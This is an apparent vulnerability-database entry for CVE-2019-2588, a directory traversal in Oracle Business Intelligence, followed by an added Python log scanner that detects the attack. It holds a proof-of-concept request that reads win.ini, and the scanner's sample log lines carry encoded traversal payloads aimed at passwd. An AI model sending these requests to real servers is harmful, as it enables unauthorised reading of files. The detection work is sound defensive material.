Vendor: Oracle Business Intelligence
By: @vah_13
CVSS: 4.9 (MEDIUM)
CWE: 22 (Directory Traversal)
Product Name: Oracle Business Intelligence
Affected Version From: 11.1.1.9.0
Affected Version To: 12.2.1.4.0
Patch Exists: NO
Related CVE: CVE-2019-2588
CPE: a:oracle:business_intelligence:11.1.1.9.0
Other Scripts:
Tags: cve,cve2019,oracle,lfi
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'vendor': 'oracle', 'product': 'business_intelligence_publisher'}
Platforms Tested: Windows
Year: 2019

Directory traversal in Oracle Business Intelligence

The vulnerability lets an attacker traverse directories and read files outside the intended directory.

Mitigation:

Apply the latest patch provided by Oracle to fix the vulnerability.

Exploit-DB raw data:

# Exploit Title: Directory traversal in Oracle Business Intelligence
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link: https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588

PoC

http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
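For defenders who cannot patch immediately, the useful artifact from the PoC above is the request shape: a GET to the adfresource servlet whose documentId parameter carries `..\` or `../` sequences. The following detection script is an added example, not part of the Exploit-DB entry or Oracle's own tooling. It scans web server access-log lines in Common Log Format (the sample lines are constructed for this example, not real traffic), URL-decodes the parameter repeatedly so percent-encoded and double-encoded variants are caught alongside the literal backslash form shown in the PoC, and reports only hits on the endpoint and parameter named on this page unless told to scan every path. The endpoint path, parameter name and log format are the only assumptions it makes.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format). These are not real
# requests; they model a benign report fetch, the PoC's literal-backslash form,
# a percent-encoded variant, a double-encoded variant, and a different endpoint.
SAMPLE_LOG = r"""
10.0.0.5 - - [16/Apr/2019:10:01:02 +0000] "GET /xmlpserver/servlet/adfresource?format=pdf&documentId=SalesReport HTTP/1.1" 200 1532
10.0.0.7 - - [16/Apr/2019:10:01:05 +0000] "GET /xmlpserver/servlet/adfresource?format=aaaa&documentId=..\..\..\Windows\win.ini HTTP/1.1" 200 403
10.0.0.8 - - [16/Apr/2019:10:01:07 +0000] "GET /xmlpserver/servlet/adfresource?format=aaaa&documentId=..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1" 200 403
10.0.0.9 - - [16/Apr/2019:10:01:09 +0000] "GET /xmlpserver/servlet/adfresource?format=x&documentId=%252e%252e%2f%252e%252e%2fetc%2fpasswd HTTP/1.1" 500 0
10.0.0.3 - - [16/Apr/2019:10:01:11 +0000] "GET /xmlpserver/login.jsp?documentId=..%2F..%2F HTTP/1.1" 200 2201
"""

# Pulls the method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A ".." path component bounded by a slash, a backslash, or the string edge.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

# Endpoint and parameter taken from the PoC on this page (assumed deployment path).
ADFRESOURCE_PATH = "/xmlpserver/servlet/adfresource"
DOCUMENT_ID_PARAM = "documentId"


def decode_repeatedly(value, rounds=3):
    """Percent-decode until stable (bounded) so double encoding does not hide '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True when the fully decoded value contains a '..' path component."""
    return TRAVERSAL_RE.search(decode_repeatedly(value)) is not None


def find_traversal_attempts(log_text, path=ADFRESOURCE_PATH, param=DOCUMENT_ID_PARAM):
    """Return one record per request whose `param` carries a traversal sequence.

    With path=None every request path is inspected; the default restricts the
    check to the adfresource servlet to keep false positives down.
    """
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if path is not None and parts.path != path:
            continue
        # parse_qs decodes one layer of percent-encoding; decode_repeatedly handles the rest.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if is_traversal(value):
                hits.append({
                    "client": line.split(" ", 1)[0],
                    "path": parts.path,
                    "value": value,
                    "normalized": decode_repeatedly(value),
                })
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['path']} {DOCUMENT_ID_PARAM}={hit['normalized']}")
```

Matching on the normalized value rather than the raw query string is what makes the literal `..\..\` form from the PoC and its `%5C` and `%252e` encodings collapse to the same finding; a raw-string match on `..\` would miss the encoded variants. Since the CVSS vector records PR:H, a hit here also points at an account that already holds high privileges, which is worth pulling into the triage alongside the request itself.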